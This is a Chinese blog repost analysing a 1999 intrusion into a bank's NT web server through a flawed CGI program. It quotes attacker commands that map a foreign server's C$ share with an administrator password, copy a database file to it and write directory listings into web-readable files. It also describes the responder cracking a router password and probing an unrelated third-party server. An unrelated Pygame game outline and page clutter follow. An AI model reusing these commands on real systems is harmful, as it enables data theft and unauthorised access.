一个黑客案列 (转)

一个黑客案列 (转)[@more@]

 

东亚某银行
时间:1999年12月 该网站为windowsNT 4.0,是这个国家最大的银行之一。该网站BankServer实际上有两道安全防线,首先在其路由器的访问控制表中(ACL)做了严格的端口过滤限制,只允许对80、443、65300进行incoming访问,另一道防火墙为全世界市场份额最大的软件防火墙FW,在FW防火墙上除了端口访问控制外,还禁止了很多异常的、利用已知CGI bug非法调用。在12月某日,该银行网站的系统管理员Ymouse(呢称)突然发现在任务列表中有一个杀不死的CMD.exe进程,而在BankServer系统上并没有与CMD.exe相关的服务。该系统管理员在一黑客聊天室向本站技术人员F求救。F认为这是一个典型的NT系统已经遭受入侵的迹象。通过EMail授权,F开始分析该系统的安全问题,从外部看,除WWW服务外,BankServer并没有向外开放任何有安全问题的服务。但F在该网站的上游路由器发现一个安全问题,允许入侵者获取该路由器的配置文件和破解密码。经过系统管理员Ymouse的再次授权确认,F仅用了3分钟,就获取了该路由器的访问密码;登录路由器后,经过复杂的分析发现,虽然该银行网站没有incoming的可疑通信,却发现BankServer正在向外连接着另一台NT服务器Wserver的139端口。通过进一步的分析,证实有人从BankServer登录到了Wserver的C盘。Wserver是一台韩国的NT服务器,不受任何安全保护的裸机。F对Wserver进行了一次简单的扫描,结果意外地发现Wserver的管理员帐号的密码极为简单,可以轻易获取对该系统的完全控制。更令人吃惊的是,在这台韩国的服务器的C盘上,保存着上面提到的东亚某银行的一个重要数据库文件!更多的文件正在从BankServer上往这台韩国的Wserver上传送!
 至此问题已经有了初步的轮廓。入侵者通过某种手段(最可能是利用WWW服务的漏洞),可以在BankServer上执行NT的shell指令。虽然入侵者不能直接登录BankServer的硬盘,但他入侵了另一台NT的Server,获取了该系统的管理员帐号。入侵者通过这台BankServer的shell指令.NET use * xxx.xxx.xxx.xxxc$ passwd /user:"administrator"),将Wserver的C盘映射成为了BankServer上的一个盘符。然后,入侵者利用copy命令,将该系统上的重要文件往Wserver上传送。 但是,既然BankServer上根本没有可以登录的入口,入侵者是如何浏览BankServer上的文件系统的?他又怎么知道哪些文件才是重要的数据文件?为了找到这个问题的答案,F请Ymouse检查了一下BankServer上的web目录。Ymouse发现,在web目录下多了一个可疑的abc目录,目录中的文件全部为文本文件,分别为x1.txt、x2.txt、x3.txt......逐个检查这些文件发现,这些文件大部分是dir c:>x.txt 和dir c:data>x.txt 生成的结果。这些文件通过 http://BankServer/abc/x.txt 的方式可以浏览。由此可见,入侵者逐个通过一些巧妙的shell指令,不仅实现了浏览系统重要文件,而且实现了创建文件、修改文件和把文件传送出去的目的。当然入侵者也可以删除系统上的文件。看起来他几乎可以做任何事情。 为了了解入侵者是如何获取系统shell的,F让Ymouse检查了最近三天的web访问日志,幸运的是,由于系统管理员在设置系统的时候多了一个心眼,把日志目录放在E盘上,而不是象缺省的那样放在c:winntsystem32logfiles下面。(入侵者删除了c:winntsystem32logfiles下面的所有文件)入侵者似乎并没有发现这些日志。当天日志显示,在 http://BankServer/login/redir.exe 被多次调用。在调用参数的末尾,Ymouse发现了很多shell指令,其中就包括了 copy c:datadb1.dat h: ,其中h:盘就是韩国Wserver的C盘。这表明,入侵者正是利用 redir.exe这个程序的漏洞,实现对系统的非法调用的。redir.exe是该银行自行编写的CGI程序。
 最后,还有一个问题没有明确的答案。入侵者大约在前一天删除了 c:winntsystem32logfiles 下面的所有文件,但删除这些文件是需要管理员的权限的。入侵者是如何获取管理员的身份执行shell指令的。Ymouse检查了IUSR_BankServer的权限,没有发现异常,只是domain Users和Guests两个组,没有Admin的权限。又或者是系统还有更为严重的漏洞?又或者是redir.exe还有其它漏洞足以获取Admin的访问?由于该安全调查纯属免费,没有再进一步深究。

 


来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10790690/viewspace-951116/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10790690/viewspace-951116/

创建一个模拟黑客的Python游戏,可以使用Pygame库来设计界面和基本的游戏机制。Pygame是一个流行的跨平台游戏开发框架,适合制作2D游戏。以下是一个简单的步骤概述: 1. **安装Pygame**:首先需要安装Pygame库,如果尚未安装,可以使用pip命令: ``` pip install pygame ``` 2. **项目初始化**:导入必要的模块并设置窗口大小、颜色等基本配置。 ```python import pygame pygame.init() screen = pygame.display.set_mode((800, 600)) pygame.display.set_caption("模拟黑客") ``` 3. **角色设计**:创建黑客和目标系统类,包括位置、状态(是否破解成功等)、动画或图像。 ```python class Hacker(pygame.sprite.Sprite): def __init__(...): super().__init__() class System(pygame.sprite.Sprite): def __init__(...): super().__init__() ``` 4. **游戏循环**:主游戏循环,处理用户输入、更新游戏状态、绘制角色和检测碰撞。 ```python running = True while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False hacker.move() # 简单地移动黑客 system.update() # 更新系统状态 screen.fill((0, 0, 0)) # 渲染黑色背景 hacker.draw(screen) system.draw(screen) pygame.display.flip() ``` 5. **攻击和防御机制**:添加攻击函数,黑客尝试破解系统,同时系统有防御措施,如反病毒扫描或防火墙。 6. **结束条件和得分**:当黑客成功或失败时,显示结果并计算分数,然后退出或开始新局。 7. **优化和美化**:添加音效、动画、更复杂的交互以及UI元素,提升游戏体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值